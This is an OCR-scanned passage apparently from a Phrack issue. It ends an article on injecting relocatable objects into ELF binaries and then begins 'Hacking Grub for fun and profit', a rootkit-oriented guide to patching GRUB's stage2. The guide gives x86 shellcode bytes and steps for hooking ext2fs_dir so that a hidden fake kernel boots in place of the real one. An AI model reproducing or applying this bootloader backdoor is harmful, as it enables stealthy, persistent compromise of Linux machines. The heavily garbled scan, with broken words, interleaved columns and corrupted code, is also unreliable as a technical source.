046] 0x00000000 -------— symtab foff:640187 sz:30192 
047] 0x00000000 -------— strtab Foff:670379 sz:25442 
*] Object ./fake_aout unloaded 
elfsh@WTH S$ ../../../vm/elfsh -f ./fake_aout -p 
*] Object ./fake_aout has been loaded (O_RDONLY) 
Program Header Table PHT] 
Object ./fake_aout] 
00] 0x8037000 -> O0x80B3D9C r-x memsz (511388) foff(000000) =>Loadable seg 
01] Ox80B4000 -> 0x80B7258 rw- memsz (012888) foff(512000) =>Loadable seg 
02] 0x80480D4 —-> 0x80480F4 r-—— memsz(000032) foff(069844) =>Aux. info. 
03] 0x0000000 -> 0x0000000 rw- memsz(000000) foff(000000) =>Stackflags 
04] 0x0000000 -—> 0x0000000 --- memsz(000000) foff(000000) =>New Paxflags 
05] O0x80B6000 -> 0x80B7000 rwx memsz (004096) foff(520192) =>Loadable seg 
06] Ox80B7000 -> O0x80B8000 rwx memsz (004096) foff(524288) =>Loadable seg 
07] Ox80B8000 -> 0x80B8004 rwx memsz (000004) foff(528384) =>Loadable seg 
08] O0x80B9000 -> Ox80BA000 rwx memsz (004096) foff(532480) =>Loadable seg 
09] Ox80BA000 -> O0x80BBO00 rwx memsz (004096) foff(536576) =>Loadable seg 
10] Ox80BBO000 -> Ox80BCO00 rwx memsz (004096) foff(540672) =>Loadable seg 
11] Ox80BCO00 -> Ox80BD000 rwx memsz (004096) foff(544768) =>Loadable seg 
12] Ox80BD000 -> Ox80BE0O00 rwx memsz (004096) foff(548864) =>Loadable seg 
13] Ox80BE0O00 -> Ox80BF0O00 rwx memsz (004096) foff(552960) =>Loadable seg 
14] Ox80BF000 -> Ox80C0000 rwx memsz (004096) foff(557056) =>Loadable seg 
15] Ox80C0000 -> 0Ox80C1000 rwx memsz (004096) foff(561152) =>Loadable seg 
16] Ox80C1000 -> 0x80C2000 rwx memsz (004096) foff(565248) =>Loadable seg 
17] Ox80C2000 -> 0x80C3000 rwx memsz (004096) foff(569344) =>Loadable seg 
18] Ox80C3000 -> 0x80C4000 rwx memsz (004096) foff(573440) =>Loadable seg 
19] O0x80C4000 -> 0x80C5000 rwx memsz (004096) foff(577536) =>Loadable seg 
20] Ox80C5000 -> 0x80C6000 rwx memsz (004096) foff (581632) =>Loadable seg 
21] Ox80C6000 -> 0x80C7000 rwx memsz (004096) foff(585728) =>Loadable seg 
SHT correlation] 
Object ./fake_aout] 
*] SHT is not stripped 
00] PT_LOAD -note.ABI-tag .init .text __libc_freeres_fn .fini 
-rodata __libc_atexit __libc_subfreeres .eh_frame 
01] PT_LOAD -ctors .dtors .jcr .data.rel.ro .got .got.plt 


.data 
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-bss __libc_freeres_ptrs 
02] PT_NOTE -note.ABI-tag 
03 PT _GNU_STACK 
04 PT PAX FLAGS 
05] PT_LOAD rel2.o.bss 
06] PT_LOAD rel2.o.text 
07] PT_LOAD rel2.o.data 
08] PT_LOAD rel2.o.rodata 
09] PT_LOAD .elfsh.hooks 
10] PT_LOAD libc/printf.o.bss 
11] PT_LOAD libc/printf.o.text 
12] PT_LOAD libc/gethostname.o.bss 
13] PT_LOAD libc/gethostname.o.text 
14] PT_LOAD libc/perror.o.bss 
15] PT_LOAD libc/perror.o.text 
16] PT_LOAD libc/perror.o.rodata.strl.1 
17] PT_LOAD libc/perror.o.rodata.str4.4 
18] PT_LOAD libc/dup.o.bss 
19] PT_LOAD libc/dup.o.text 
20] PT_LOAD libc/iofdopen.o.bss |.comment 
21] PT_LOAD libc/iofdopen.o.text 
*] Object ./fake_aout unloaded 
========= END DUMP 42 ========= 


We can notice the ET_REL really injected : printf.o@libc, 
dup.o@libc, gethostname.o@libc, perror.o@libc and 
iofdopen.o@libc. 


Each injected file create several PT_LOAD segments. For thi 
example it is okay, but for injecting E2dbg that is really 
much. 


This technique will be improved as soon as possible by reus 
PT_LOAD entry when this is possible. 


D. Architecture independant algorithms 


In this part, we give all the architecture independent algorit 


s 
too 


ing 


hms 


that were developed for the new residency techniques in memory, 


ET_DYN libraries, or static executables. 
The new generic ET_REL injection algorithm is not that differe 
from the one presented in the first Cerberus Interface article 
that is why we only give it again in its short form. However, 


nt 
[0], 
the 


new algorithm has improved in modularity and portability. We will 


detail some parts of the algorithm that were not explained in 
previous articles. The implementation mainly takes place in 
elfsh_inject_etrel() in the relinject.c file 


New generic relocation algorithm 


1/ Inject ET_REL BSS after the HOST BSS in a dedicated section 


2/ FOREACH section in ET_REL object 
[ 


IF [ Section is allocatable and Section is not BSS ] 


[ 


- Inject section in Host file or memory 


] 


(new) 
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3/ Fuze ET_REL and host file symbol tables 


4/ Relocate the ET_REL object (STAGE 1) 


5/ At save time, relocate the ET_REL object 
(STAGE 2 for old symbols relocations) 


We only had one relocation stage in the past. We had to use another 
one since not all requested symbols are available (like old symbols 
gained from CFLOW redirections that may happen after the ET_REL 
injection). For ondisk modifications, the second stage relocation 
is done at save time. 


Some steps in this algorithm are quite straightforward, such as 

step 1 and step 3. They have been explained in the first Cerberus 
article [0], however the BSS algorithm has changed for compatibility 
with ET_DYN files and multiple ET_REL injections. Now the BSS is 
injected just as other sections, instead of adding a complex BSS 
zones algorithm for always keeping one bss in the program. 


ET_DYN / ET_EXEC section injection algorithm 


Injection algorithm for DATA sections does not change between ET_EXEC 
and ET_DYN files. However, code sections injection slighly changed 
for supporting both binaries and libraries host files. Here is the 


new algorithm for this operation 


* Find executable PT_LOAD 
* Fix injected section size for page size congruence 


IF [ Hostfile is ET_EXEC ] 


* Set injected section vaddr to lowest mapped section vaddr 
* Substract new section size to new section virtual address 


ELSE IF [ Hostfile is ET_DYN ] 


* Set injected section vaddr to lowest mapped section vaddr 


* Extend code segment size by newly injected section size 


IF [| Hostfile is ET_EXEC ] 


* Substract injected section vaddr to executable PT_LOAD vaddr 


FOREACH [ Entry in PHT ] 


IF [ Segment is PT_PHDR and Hostfile is ET_EXEC ] 


* Substract injected section size to segment p_vaddr / p_paddr 


ELSE IF [| Segment stands after extended PT_LOAD ] 
[ 


* Add injected section size to segment p_offset 
IF [ Hostfile is ET_DYN ] 
[ 


* Add injected section size to segment p_vaddr and p_paddr 


] 
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IF [ Hostfile is ET_DYN ] 


FOREACH [ Relocation entry in every relocation table ] 


IF [ Relocation offset points after injected section ] 


* Shift relocation offset from injected section size 


Shift dynamic syms from injected section size (same condition) 
Shift dynamic entries D_PTR’s from injected section size 
Shift GOT entries from injected section size 

If existing, Shift ALTGOT entries from injected section size 
Shift DTORS and CTORS the same way 

Shift the entry point in ELF header the same way 


+ + + F F F F 


* Inject new SECTION symbol on injected code 


Static ET_EXEC section injection algorithm 


This algorithm is used to insert sections inside static binaries. 
can be found in libelfsh/inject.c in elfsh_insert_static_section () 


Pad the injected section size to stay congruent to page size 
Create a new PT_LOAD program header whoose bounds match the 
new section bounds. 

Insert new section using classical algorithm 

Insert new program header in PHT 


Runtime section injection algorithm in memory 


This algorithm can be found in libelfsh/inject.c in the function 
elfsh_insert_runtime_section () 


Create a new PT_LOAD program header 
Insert SHT entry for new runtime section 
(so we keep a static map up-to-date) 
Insert new section using the classical algorithm 
* Insert new PT_LOAD in Runtime PHT table (RPHT) with same bounds 


Runtime PHT is a new table that we introduced so that we can 
separate segments regulary mapped by the dynamic linker (original 
PHT segments) from runtime injected segments. This may lead to an 
easier algorithm for binary reconstruction from its memory image 
in the future. 


We will detail now the core (high level) relocation algorithm as 
implemented in elfsh_relocate_object() and 
elfsh_relocate_etrel_section() functions in libelfsh/relinject.c 
This code is common for all types of host files and for all 
relocation stages. It is used at STEP 4 of the general algorithm: 


Core portable relocation algorithm 


This algorithm has never been explained in any paper. Here it is 


Shift symbols from injected section size when pointing after it 


It 
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FOREACH Injected ET_REL sections inside the host file 


A 


file 


FOREACH relocation entry in ET_R 
[ 


* Find needed symbol in ET_REL for this relocation 
IF [ Symbol is COMMON or NOTYPE ] 
[ 


* Find the corresponding symbol in Host file. 
LE Symbol is NOT FOUND ] 
[ 


IF [ symbol is OLD and RELOCSTAGE == 1 ] 


* Delay relocation for it 


ELSE 


IF [ ET_REL symbol type is NOTYPE ] 


* Request a new PLT entry and use its address 
for performing relocation (EXTPLT algorithm) 


ELSE IF [ Host file is STATIC ] 


* Perform EXTSTATIC technique (next algorithm) 


ELSE 


* Algorithm failed, return ERROR 


* Use host file’s symbol value 


* Use injected section base address as symbol value 


] 


- Relocate entry (switch/case architecture dependant handler) 


EXTSTATIC relocation extension algorithm 


In case the host file is a static file, we can try to get the 
unknown symbol from relocatables files from static libraries that 
are available on disk. An example of use of this EXTSTATIC technique 
is located in the testsuite/etrel_inject/ directory. 


Here is the EXTSTATIC algorithm that comes at the specified place 
in the previous algorithm for providing the same functionality as 
EXTPLT but for static binaries 


FOREACH loaded ET_REL objects in ELFSH 


IF [ Symbol is found anywhere in current analyzed ET_REL ] 


IF [ Found symbol is strongest than current result ] 


[ 


* Update best symbol result and associated ET_REL file 


] 
ELSE 
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] 


] 
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[ 


* Discard current iteration result 


] 


* Inject the ET_REL dependency inside Host file 


* Use newly i 
relocation al 


njected symbol in hostfile as rel 
gorithm. 


Strongest symbol algorithm 


Location symbol in core 


When we have to choose between multiple symbols that have the same 


name in different objects 
injection), 


to use 


IF 


[ 


Current chosen 


Symbol becomes 


IF [ Candidate 


Symbol becomes 


t 


modified binary. Of course, 


Ss 
a 


IF [ Candidate 


sym 


tem 


sym 


tem 


sym 


bol has STT_NOTYP 


Gl 
hae 


porary choice 


bol has STT_NOTYP 


GJ 
in4 


porary choice 


(either during static or runtime 
we use this simple algorithm to determine which one 


bol binding > Chosen symbol binding ] 


Candidate symbol becomes Chosen symbol 


I. Past and present 


on-relocatable 


im 
ry 


n the past we have shown that ET_REL injection into 


XEC object is possible. This 


G 
ct 


ile, we can add 


echnique that all 
a 


iple extensions a 


n the software extension. 


paper presented 


nd ports to this residency technique 

DYN and static executables target). Coupled to the EXTPLT 
low for a complete post-linking of the host 
function definitions and use unknown functions 
All those static injection 


echniques worse when all PaX options are enabled on the 


mas 


nything when it comes to binary manipulation, 


the position independant and stack 
hing protection features of hardened Gentoo does not protect 


on disk or at runtime. 


ither performed 


We have also shown that it is possible to debug without using 


the ptrace system call, 


which open the door for new reverse 


engineering and embedded debugging methodology that bypass known 
anti-debugging techniques. Th mbedded debugger 
completely PaX proof and it is still necessary to disable the 
protect flag. Even if it does not sound like a real problem, 
e are still investigating on how to put breakpoints (e.g. 

edirections) without disabling it. 


m 
Ww 
r 


Our core techniques are portabl 


a 


lpha, mips, sparc) 
our proof of concept debugger was done for x86 only. We believe 
that our techniques are portable enough to be abl 
the debugger for other architectures without much troubles. 


on both 32bits and 64bits fil 


Share and enjoy the framework, contributions are 


is not 


le to many architectures (x86, 


les. However 


le to provide 


welcome. 
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[ Hacking Grub for fun and profit ] 


[ CoolQ <qufuping@ercist.iscas.ac.cn> ] 


--[{ Conten 


0.0 


PPR 
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--[ 0.0 - 


Since 
Hiding out 
From the e 
knark/ador 
static ker 

Think 

So, in 
is, it can 
specify in 


P.S.: This 
== [kee On = 


----[ 1.1 


ts 


— Trojan/backdoor/rootkit review 


— Boot process with Grub 
-1 How does Grub work ? 


stagel 


2 
.3 stagel.5 & stage2 
4 


Grub util 
Possibility to load specified file 


Hacking techniques 


.l1 How to load file fake 


How to locate ext2fs_dir 


2 
-3 How to hack grub 
4 


How to make things sneaky 
Usage 
Detection 
At the end 
Ref 
hack_grub.tar.gz 
Trojan/backdoor/rootkits review 


1989 when the first log-editing tool appeared(Phrack 0x19 #6 - 
under Unix), the trojan/backdoor/rootkit hav volved greatly. 
arly user-mode tools such as LRK4/5, to kernel-mode ones such as 
e/adore-ng, then appears SuckIT, module-injection, nowadays even 

nel-patching. 
carefully, what remains untouched? Yes, that’s bootloader. 

this paper, I present a way to make Grub follow your order, that 
load another kernel/initrd image/grub.conf despite the file you 
grub.conf. 


paper is based on Linux and EXT2/3 under x86 system. 
Boot process with Grub 


-— How does Grub work ? 


boot, load 
MBR 
NO 
Grub is in MBR > 
Yes stagel 
Yes jump to active 

ft-—< stagel.5 config? partition 
| 
| No 
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| 
load embedded stagel-> load boot 
sectors | sector 
V 
a < Cf 1.3 
| 
stagel.5 > > load stage2 + 
< 
V 


load the grub.conf 
display the boot menu 


User interaction 


load kernel image 
and boot 


----[ 1.2 - stagel 


stagel is 512 Bytes, you can see its source code in stagel/stagel.s 
It’s installed in MBR or in boot sector of primary partition. The task is 
Simple - load a specified sector (defined in stage2_sector) to a specified 
address (defined in stage2_address/stage2_segment). If stagel.5 is 
configured, the first sector of stagel.5 is loaded at address 0200:000; if 
not, the first sector of stage2 is loaded at address 0800:0000. 


----[ 1.3 - stagel.5 & stage2 


We know Grub is file-system-sensitive loader, i.e. Grub can understand 
and read files from different file-systems, without the help of OS. Then 
how? The secret is stagel.5 & stage2. Take a glance at /boot/grub, you’11l 
find the following files: 
stagel, stage2, e2fs_stagel_5, fat_stagel_5, ffs_stagel_5, minix_stagel_5, 
reiserfs_stagel_5, 

We’ve mentioned stagel in 1.2, the file stagel will be installed in MBR 
or in boot sector. So even if you delete file stagel, system boot are not 
affected. 

What about zeroing file stage2 and *_stagel_5? Can system still boot? 
The answer is ‘no’ for the former and /’yes’ for the latter. You’re 
wondering about the reason? Then continue your reading... 


Let’s see how *_stagel_5 and stage2 are generated: 


BEGIN 


e2fs_stagel_5: 

gcc -o e2fs_stagel_5.exec -nostdlib -W1,-N -W1,-Ttext -W1,2000 
e2fs_stagel_5_exec-start.o e2fs_stagel_5_exec-asm.o 
e2fs_stagel_5_exec-common.o e2fs_stagel_5_exec-char_io.o 
e2fs_stagel_5_exec-disk_io.o e2fs_stagel_5_exec-stagel_5.o 
e2fs_stagel_5_exec-fsys_ext2fs.o e2fs_stagel_5_exec—bios.o 

objcopy -O binary e2fs_stagel_5.exec e2fs_stagel_5 


stage2: 
gcc -o pre_stage2.exec -nostdlib -W1,-N -W1,-Ttext -W1,8200 


pre_stage2_exec-asm.o pre_stage2_exec-bios.o pre_stage2_exec-—boot.o 
pre_stage2_exec-builtins.o pre_stage2_exec-—common.o 
pre_stage2_exec-char_io.o pre_stage2_exec-cmdline.o 
pre_stage2_exec-disk_io.o pre_stage2_exec-gunzip.o 
pre_stage2_exec-fsys_ext2fs.o pre_stage2_exec-fsys_fat.o 
pre_stage2_exec-fsys_ffs.o pre_stage2_exec-fsys_minix.o 
pre_stage2_exec-fsys_reiserfs.o pre_stage2_exec-fsys_vstafs.o 
pre_stage2_exec-hercules.o pre_stage2_exec-serial.o 
pre_stage2_exec-smp-imps.o pre_stage2_exec-stage2.o 
pre_stage2_exec-md5.o 


10.txt Wed Apr 26 09:43:44 2017 


objcopy -O binary pre_stage2. 


xec pre_s 
cat start pre_stage2 > stage2 


tage2 


END 


According to the output above, 


the layout should be: 


e2fs_stagel_5: 
start.S] [asm.S] [common.c] [char_io.c] [disk_io.c] [stagel_5.c] 
fsys_ext2fs.c] [bios.c] 

stage2: 
start.S] [asm.S] [bios.c] [boot.c] [builtins.c] [common.c] [char_io.c] 
cmdline.c] [disk_io.c] [gunzip.c] [fsys_ext2fs.c] [fsys_fat.c] 
fsys_ffs.c] [fsys_minix.c] [fsys_reiserfs.c] [fsys_vstafs.c] 
hercules.c] [serial.c] [smp-imps.c] [stage2.c] [md5.c] 


We can see e2fs_stagel_5 and stage2 
smaller, 
initialization, 
which contains all file system modules, 


start.S is very important for Grub. 
0200:0000(if stagel_5 is configured) 
it. The task of start.S is simple(only 
of stagel_5 or stage2 to memory. 


which contains basic modules(disk io, 
ext2/3 file system handling), 


or 0800:0000(if not), 


The question is, 


are Similar. But e2fs_stagel_5 is 
string handling, system 

while stage2 is all-in-one, 

display, encryption, etc. 


stagel will load start.S to 

then jump to 
512Byte),it will load the rest parts 
since the file-system 


related code hasn’t been loaded, how can grub know the location of the rest 


sectors? start.S makes a trick: 


BEGIN 
blocklist_default_start: 
-long 2 /* this is the sector start parameter, in logical 
sectors from the start of the disk, sector 0 */ 
blocklist_default_len: /* this is the number of sectors to read */ 
ifdef STAGE1_5 
.word 0 /* the command "install" will fill this up */ 
else 
.word (STAGE2 SIZE + 511) >> 9 
endif 
blocklist_default_seg: 
ifdef STAGE1_5 
-word 0x220 
else 
-word 0x820 /* this is the segment of the starting address 
to load the data into */ 
endif 
firstlist: /* this label has to be after the list data!!! */ 
END 
an example: 
# hexdump -x -n 512 /boot/grub/stage2 
00001d0 [ 0000 0000 0000 0000 J{[ 0000 0000 0000 0000 | 
00001le0 [ 62c7 0026 0064 1600 J[ 62af 0026 0010 1400 ] 
00001f0 [ 6287 0026 0020 1000 J[ 61d0 0026 003f 0820 | 
We should interpret (backwards) it as: load 0x3f sectors(start with No. 
0x2661d0) to 0x0820:0000, load 0x20 sectors(start with No.0x266287) to 
0x1000:0000, load 0x10 sectors(start with No.0x2662af) to 0x1400:00, load 


0x64 sectors(start with No.0x2662c7) to 


0x1600:0000. 


In my distro, stage2 has 0xd4(1+0x3 


is 108328 bytes, 


When start.S finishes running, 
jumps to asm.S and continues to 


xecut 


There still 
stagel.5 is not 
memory. But pay attention, 


remains a problem, when 
necessary. 


stagel.5 us 


stagel_5/stage2 is fully loaded. 


£+0x20+0x10+0x64) sectors, file size 


the two matches well(sector size is 512). 


Start. S 


is stagel.5 configured? In fact, 


Its task is to load /boot/grub/stage2 to 


s fil 


It analyzes the dentry, 


if stagel.5 is configured, th 


stage2 i 


gets stage2’s inode, 


system to load file stage2: 
then stage2’s blocklists. So 
s loaded via file system; if not, 
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stage2 is loaded via both stage2_sector in stagel and sector lists in 
start.S of stage2. 

To make things clear, suppose the following scenario: (ext2/ext3) 

# mv /boot/grub/stage2 /boot/grub/stage2.bak 

If stagel.5 is configured, the boot fails, stagel.5 can’t find 
/boot/grub/stage2 in the file-system. But if stagel.5 is not configured, 
the boot succeeds! That’s because mv doesn’t change stage2’s physical 
layout, so stage2_sector remains the same, also the sector lists in stage2. 


Now, stagel (-> stagel.5) -> stage2. Everything is in position. asm.S 
will switch to protected mode, open /boot/grub/grub.conf(or menu.lst), get 
configuration, display menus, and wait for user’s interaction. After user 
chooses the kernel, grub loads the specified kernel image (sometimes 
ramdisk image also), then boots the kernel. 


----[{ 1.4 - Grub util 


If your grub is overwritten by Windows, you can use grub util to 
reinstall grub. 


# grub 

grub > find /grub/stage2 <- if you have boot partition 
or 
grub > find /boot/grub/stage2 <- if you don’t have boot partition 


(hdd, 0) <= the result of ’ find’ 

grub > root (hd0O,0) <- set root of boot partition 

grub > setup (hd0) <- if you want to install grub in mbr 

or 

grub > setup (hd0O,0) <- if you want to install grub in the 

Sse boot sector 

Checking if "/boot/grub/stagel" exists... yes 

Checking if "/boot/grub/stage2" exists... yes 

Checking if "/boot/grub/e2fs_stagel_t" exists... yes 

Running "embed /boot/grub/e2fs_stagel_5 (hd0)"... 22 sectors are 
embedded succeeded. <= if you install grub in boot sector, 


this fails 
Running "install /boot/grub/stagel d (hd0) (hd0)1+22 p 
(hd0,0) /boot/grub/stage2 /boot/grub/grub.conf"... succeeded 
Done 


We can see grub util tries to embed stagel.5 if possible. If grub is 
installed in MBR, stagel.5 is located after MBR, 22 sectors in size. If 
grub is installed in boot sector, there’s not enough space to embed 
stagel.5(superblock is at offset 0x400 for ext2/ext3 partition, only 0x200 
for stagel.5), so the ’embed’ command fails. 

Refer to grub manual and source codes for more info. 


--[ 2.0 - Possibility to load specified file 


Grub has its own mini-file-system for ext2/3. It use grub_open(), 
grub_read() and grub_close() to open/read/close a file. Now, take a look at 
ext2fs_dir 


/* preconditions: ext2fs_mount already executed, therefore supblk in buffer 
x known as SUPERBLOCK 
* returns: O if error, nonzero iff we were able to find the file 
is successfully 
* postconditions: on a nonzero return, buffer known as INODE contains the 
* inode of the file we were trying to look up 
* side effects: messes up GROUP_DESC buffer area 
* / 
int ext2fs_dir (char *dirname) { 
int current_ino = EXT2_ROOT_INO; /*start at the root */ 


int updir_ino = current_ino; /* the parent of the current directory */ 
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Suppose the line in grub.conf is: 

kernel=/boot/vmlinuz—-2.6.11 ro root=/dev/hdal 

grub_open calls ext2fs_dir("/boot/vmlinuz—2.6.11 ro root=/dev/hdal"), 
ext2fs_dir puts the inode info in INODE, then grub_read can use INODE to 
get data of any offset(the map resides in INODE->i_blocks[] for direct 


blocks). 


The internal of ext2fs_dir is: 


1. /boot/vmlinuz-2.6.11 ro root=/dev/hdal 
“ inode = EXT2_ROOT_INO, put inode info in INODE; 
2. /boot/vmlinuz-2.6.11 ro root=/dev/hdal 
“ find dentry in ’/’, then put the inode info of '’/boot’ in INODE; 
3. /boot/vmlinuz-2.6.11 ro root=/dev/hdal 
“ find dentry in ’/boot’, then put the inode info of 
'/boot/vmlinuz-2.6.11’ in INODE; 
4. /boot/vmlinuz-2.6.11 ro root=/dev/hdal 


A ma 


the pointer is space, INODE is regular file, 
returns 1(success), INODE contains info about 
'/boot/vmlinuz—-2.6.11’. 


If we parasitize this code, and return inode info of file_fake, grub 
will happily load file_fake, considering it as /boot/vmlinuz-2.6.11. 
We can do this: 
1. /boot/vmlinuz-2.6.11 ro root=/dev/hdal 
“ inode = EXT2_ROOT_INO; 
2. boot/vmlinuz-2.6.11 ro root=/dev/hdal 
“ change it to 0x0, change EXT2_ROOT_INO to inode of file_fake; 
3. boot/vmlinuz-2.6.11 ro root=/dev/hdal 
“ EXT2_ROOT_INO(file_fake) info is in INODE, the pointer is 0x0, 
INODE is regular file, returns 1. 


Since we change the argument of ext2fs_dir, does it have side-effects? 
Don’t forget the latter part "ro root=/dev/hdal", it’s the parameter passed 
to kernel. Without it, the kernel won’t boot correctly. 

(P.S.: Just "cat/proc/cmdline" to see the parameter your kernel has.) 

So, let’s check the internal of "kernel=..." 

kernel_func processes the "kernel=..." line 


static int 
kernel_func (char *arg, int flags) 


{ 


/* Copy the command-line to MB_CMDLINE. */ 
grub_memmove (mb_cmdline, arg, len + 1); 
kernel_type = load_image (arg, mb_cmdline, suggested_type, load_flags); 


See? The arg and mb_cmdline have 2 copies of string 
"/boot/vmlinuz-2.6.11 ro root=/dev/hdal" (there is no overlap, so in fact, 
grub_memmove is the same as grub_memcpy). In load_image, you can find arg 
and mb_cmdline don’t mix with each other. So, the conclusion is - NO 


side-effects. If you’re not confident, you can add some codes to get things 
back. 


--[ 3.0 - Hacking techniques 


The hacking techniques should be general for all grub versions (exclude 
grub-ng) shipped with all Linux distros. 


----[ 3.1 - How to load file fake 


We can add a jump at the beginning of ext2fs_dir, then make the first 
character of ext2fs_dir’s argument to 0, make "current_ino = EXT2_ROOT_INO" 
to "current_ino = INODE_OF_FAKE_FILE", then jump back. 

Attention: Only when certain condition is met can you load file_fake. 
e.g.: When system wants to open /boot/vmlinuz-2.6.11, then /boot/file_fake 
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is returned; while when system wants /boot/grub/grub.conf, the correct file 
should be returned. If the codes still return /boot/file_fake, oops, no 
menu display. 
Jump is easy, but how to make "Ccurrent_ino = INODE_OF_FAKE_FILE"? 
int ext2fs_dir (char *dirname) { 
int current_ino = EXT2_ROOT_INO; /*start at the root */ 
int updir_ino = current_ino; /* the parent of the current directory */ 


EXT2_ROOT_INO is 2, so current_ino and updir_ino are initialized to 2. 
he correspondent assembly code should be like "movl $2, OxffffXxXxx(Sesp)" 
ut keep in mind of optimization: both current_ino and updir_ino are 
ssigned to 2, the optimized result can be "movl $2, OxffffXxxx(Sesp)" 

nd "movl $2, OxffffYYYY(Sesp)", or "movl $2, %Sreg" then "movl %reg, 
xffffXXXX(Sesp)" "movl %reg, OxffffYYYY(Sesp)", or more variants. The type 
s int, value is 2, so the possibility of "xor %Seax, %Seax; inc %eax; 
nce %eax" is low, it’s also the same to "xor %eax, %eax; movb $0x2, %al". 
hat we need is to search 0x00000002 from ext2fs_dir to ext2fs_dir + 
depth(e.g.: 100 bytes), then change 0x00000002 to INODE_OF_FAKE_FILE. 


SrrP OM WH 


static char ext2_embed_code[] = { 
0x60, /* pusha * / 
Ox9c, /* pushf */ 
Oxeb, 0x28, /* jmp 4f * / 
Ox5f£, /* 1: pop %edi ay 
Ox8b, Oxf, /* movl (%edi), %ecx Bad 
Ox8b, Ox74, 0x24, 0x28, /* movl 40(%esp), %esi * / 
0x83, Oxc7, Ox4, /* addl $4, %edi * / 
Oxf3, Oxa6, /* repz cmpsb %es: (%edi), %ds: (%esi) * / 
0x83, Oxf9, Ox0, /* cmp $0, %ecx */ 
0x74, Ox2, (fe vjfe-2t */ 
Oxeb, Oxe, /* jmp 3f x / 
Ox8b, 0x74, 0x24, 0x28, /* 2: movl 40(%esp), %esi */ 
Oxc6, Ox6, 0x00, /* movb $0x0, (%esi) EN OF * / 
0x9d, /* popf ay 
Ox6l, /* popa aes 
Oxe9, Ox0, Ox0, Ox0, Ox0O, /* jmp change_inode Af 
0x9d, /* 3: popf ay 
Ox6l, /* popa u/, 
Oxe9, Ox0, Ox0, Ox0, Ox0O, /* jmp not_change_inode */ 
Oxe8, Oxd3, Oxff, Oxff, Oxff, /* 4: call 1b Af 
0x0, Ox0, Ox0, Ox0, /* kernel filename length */ 


Ox0, Ox0, Ox0, Ox0, Ox0, Ox0, /* filename string, 48B in all */ 
0x0, Ox0, Ox0, Ox0, Ox0, Ox0O, 
0x0, Ox0, Ox0, Ox0, Ox0, Ox0O, 
0x0, Ox0, Ox0, Ox0, Ox0, Ox0O, 
0x0, Ox0, Ox0, Ox0, Ox0, Ox0O, 
0x0, Ox0, Ox0, Ox0, Ox0, Ox0O, 
0x0, Ox0, Ox0, Ox0, Ox0, Ox0O, 
0x0, Ox0, Ox0, Ox0, Ox0, Ox0 
}; 


memcpy ( buf_embed, ext2_embed_code, sizeof (ext2_embed_code) ); 
Of course you can write your own string-comparison algorithm. 


/* embeded code, 2nd part, change_inode */ 
memcpy ( buf_embed + sizeof (ext2_embed_code), s_start, s_mov_end - s_start); 
modify_EXT2_ROOT_INO_to_INODE_OF_FAKE_FILE(); 


/* embeded code, 3rd part, not_change_inode*/ 
memcpy ( buf_embed + sizeof (ext2_embed_code) + (S_mov_end - s_start) + 5, 
s_start, s_mov_end - s_start); 


[The result is like this: 


ext2fs_dir: not_change_inode: 
> 4 
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push %Sesp <= jmp embed push %Sesp 

mov %esp, %Sebp mov %Sesp, %Sebp 

push %Sedi push %Sedi 

push %Sesi t-SSScS Ss < push %Sesi 

sub S$0x42c, %esp sub S$0x42c, %esp 

mov $2, fffffbe4(%Sesp) mov $2, fffffbe4(Sesp) 
mov $2, fffffbe0 (Sesp) mov $2, fffffbe0 (Sesp) 
back: jmp back 

embed: t-------- > change_inode: 

save registers push %Sesp 

compare strings mov %Sesp, %Sebp 

if match, goto 1 push %Sedi 

if not, goto 2 push %Sesi 

1: restore registers sub $0x42c, %esp 

jmp change_inode INODE_OF_ -> mov $?, fffffbe4 (Sesp) 
2: restore registers FAKE FILE -> mov $?, fffffbe0 (Sesp) 
jmp not_change_inode jmp back 


-—---[ 3.2 -—- How to locate ext2fs_dir 


That’s the difficult part. stage2 is generated by objcopy, so all ELF 
information are stripped - NO SYMBOL TABLE! We must find some PATTERNs to 
locate ext2fs_dir. 


The first choice is log2: 
define long2(n) ffz(" (n)) 
static __inline__ unsigned long 
ffz (unsigned long word) 


—_asm__ ("bsfl %1, %0" 
:"=r" (word) 
Mage! (WOE) +) 5} 


return word; 


} 
group_desc = group_id >> log2 (EXT2_DESC_PER_BLOCK (SUPERBLOCK) ) ; 


GJ 


The question is, ffz is declared as __inline__, which indicates MAYB 


= 


this function is inlined, MAYBE not. So we give it up. 


Next choice is SUPERBLOCK->s_inodes_per_group in 

group_id = (current_ino - 1) / (SUPERBLOCK->s_inodes_per_group) ; 
define RAW_ADDR(x) (x) 

define FSYS_BUF RAW_ADDR(0x68000) 

define SUPERBLOCK ((struct ext2_super_block *) (FSYS_BUF) ) 
struct ext2_super_block{ 


__u32 s_inodes_per_group /* # Inodes per group */ 


} 


Then we calculate SUPERBLOCK->s_inodes_per_group is at 0x68028. This 
address only appears in ext2fs_dir, so the possibility of collision is low. 
After locating 0x68028, we move backwards to get the start of ext2fs_dir. 
Here comes another question, how to identify the start of ext2fs_dir? Of 
course you can search backwards for Oxc3, likely it’s ret. But what if it’s 
only part of an instruction such as operands? Also, sometimes, gcc adds 
some junk codes to make function address aligned (4byte/8byte/1l6byte), then 
how to skip these junk codes? Just list all the possible combinations? 

This method is practical, but not ideal. 


Now, we noticed fsys_table: 


struct fsys_entry fsys_table[NUM_FSYS + 1] = 
{ 
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ifdef FSYS_FAT 

{"fat", fat mount, fat_read, fat_dir, 0, 0}, 

endif 

ifdef FSYS_EXT2FS 

{"ext2fs", ext2fs_mount, ext2fs_read, ext2fs_dir, 0, 0}, 
endif 

ifdef FSYS_MINIX 

{"minix", minix_mount, minix_read, minix_dir, 0, 0}, 
endif 


}; 


fsys_table is called like this: 


if ((*(fsys_table[fsys_type].mount_func)) () != 1) 


So, our trick is: 

1. Search stage2 for string "ext2fs", get its offset, then convert it to 
memory address(stage2 starts from 0800:0000) addr_l. 

2. Search stage2 for addr_l, get its offset, then get next 5 integers 
(A, B, C, D, E), A<B ? B<C ? C<addr_1l ? D==0 ? E==0? If any one is "No", 
goto 1 and continue search 

3. Then C is memory address of ext2fs_dir, convert it to file offset. OK, 
that’s it. 


----[ 3.3 - How to hack grub 


OK, with the help of 3.1 and 3.2, we can hack grub very easily. 

The first target is stage2. We get the start address of ext2fs_dir, add 
a JMP to somewhere, then copy th mbeded code. Then where is ’somewhere’ ? 
Obviously, the tail of stage2 is not perfect, this will change the file 
size. We can choose minix_dir as our target. What about fat_mount? It’s 
right behind ext2fs_dir. But the answer is NO! Take a look at "root ..." 


root_func ()->open_device () ->attemp_mount () 
for (fsys_type = 0; fsys_type < NUM_FSYS 
